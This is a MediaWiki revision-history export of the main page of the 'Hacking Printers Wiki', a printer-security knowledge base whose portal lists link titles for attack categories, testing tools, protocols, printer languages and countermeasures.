[//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 9f757506a44968897049d412ab623d93fbe23fd2 15 14 2016-11-25T19:02:32Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Vendors]], [[Admins]], [[Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Some literature]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | * [[Links|Further reading]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Hacking [[PostScript processing websites]]</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 9ca23ffa7ccce3af9f957def8ac9f2457614b8c6 14 13 2016-11-25T18:46:51Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Vendors]], [[Admins]], [[Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Some literature]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | * [[Links|Further reading]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Hacking [[PostScript processing websites]]</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ f119624a646983441be0196df8fdf58d800f758b 13 12 2016-11-25T18:43:13Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Vendors]], [[Admins]], [[Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Some literature]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | * [[Links|Further reading]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:4px 8px;">Hacking PostScript: processors and related websites</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ ccf2dcdd9b551b756ceec85f2322891d4b1878af 12 11 2016-11-23T13:37:25Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | Check out the [[Printer Security Testing Cheat Sheet]] |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Vendors]], [[Admins]], [[Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Some literature]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | * [[Links|Further reading]] |} |} Beyond Printers --------------- + Hacking PostScript Processors / websites Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] __NOTOC__ 56ab6984fb3bae8608eb6d3ce7ae8411aa468079 11 9 2016-11-23T13:33:04Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | Check out the [[Printer Security Testing Cheat Sheet]] |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[For network administrators]] * [[For printer manufacturers]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Some literature]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | * [[Links|Further reading]] |} |} Beyond Printers --------------- + Hacking PostScript Processors / websites Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] __NOTOC__ c97c3c132fbed2e2c581a46424006c9e33ca7fd3 9 2 2016-11-22T10:53:26Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> This is the '''Printer Hacking Wiki''', an open approach to share knowledge on printer (in)security. </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | Check out the [[Printer Security Testing Cheat Sheet]] |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Network Protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] * '''[[Printer Languages]] ** [[PJL]], [[PCL]], [[PostScript]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Dedicated Print Server]] * [[Table 8.1]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | ... |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | ... http://www.undocprint.org/ |} |} Beyond Printers --------------- + PostScript Processors / websites Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] __NOTOC__ 52c716d69ed640c5fd722c404846518a9cfe0dfd 2 1 2016-11-22T09:10:28Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> This is the '''Printer Hacking Wiki''', an open approach to share knowledge on printer (in)security. </div> <strong>MediaWiki has been successfully installed.</strong> Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] 26e52855c5246add9dd357c29b1af265e5288128 1 2016-11-21T10:24:24Z MediaWiki default 0 wikitext text/x-wiki <strong>MediaWiki has been successfully installed.</strong> Consult the 